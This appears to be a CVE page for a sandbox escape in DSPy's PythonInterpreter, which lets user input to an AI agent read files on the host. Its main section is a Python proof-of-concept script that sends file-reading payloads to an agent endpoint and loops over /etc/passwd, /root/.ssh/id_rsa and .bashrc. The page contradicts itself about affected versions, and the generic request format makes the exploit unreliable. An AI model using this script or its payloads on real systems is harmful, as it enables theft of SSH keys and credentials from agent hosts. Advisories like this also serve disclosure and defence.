CVE-2025-12695

Description

The overly permissive sandbox configuration in DSPy allows attackers to steal sensitive files in cases when users build an AI agent which consumes user input and uses the “PythonInterpreter” class.

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

DSPy < 2.5.35

DSPy PythonInterpreter class (all versions prior to patch)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2025-12695 PoC - DSPy PythonInterpreter Sandbox Escape
# Target: DSPy application using PythonInterpreter with user input

def exploit_dspy_file_read(target_url, target_file='/etc/passwd'):
    """
    Exploit DSPy PythonInterpreter sandbox escape to read arbitrary files
    """
    # Malicious payload to read files through PythonInterpreter
    payload = f"__import__('os').read(__import__('os').open('{target_file}', 0), 10000)"
    
    # Alternative payload using built-in open
    alt_payload = f"open('{target_file}').read()"
    
    # Send request to vulnerable endpoint
    data = {
        'input': payload,
        'use_interpreter': True
    }
    
    try:
        response = requests.post(target_url, json=data, timeout=10)
        if response.status_code == 200:
            result = response.json()
            print(f"[+] Successfully read file: {target_file}")
            print(result.get('output', 'No output'))
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

# Example usage
if __name__ == "__main__":
    target = "http://vulnerable-app.com/api/execute"
    
    # Read sensitive files
    files_to_read = [
        '/etc/passwd',
        '/root/.ssh/id_rsa',
        '/home/*/.bashrc'
    ]
    
    for file_path in files_to_read:
        exploit_dspy_file_read(target, file_path)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12695
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12695
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12695/
[4] VulDB https://vuldb.com/cve/CVE-2025-12695
[5] https://research.jfrog.com/vulnerabilities/dspy-sandbox-escape-arbitrary-file-read-jfsa-2025-001495652/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12695", "sourceIdentifier": "[email protected]", "published": "2025-11-04T14:15:34.087", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The overly permissive sandbox configuration in DSPy allows attackers to steal sensitive files in cases when users build an AI agent which consumes user input and uses the “PythonInterpreter” class."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-653"}]}], "references": [{"url": "https://research.jfrog.com/vulnerabilities/dspy-sandbox-escape-arbitrary-file-read-jfsa-2025-001495652/", "source": "[email protected]"}]}}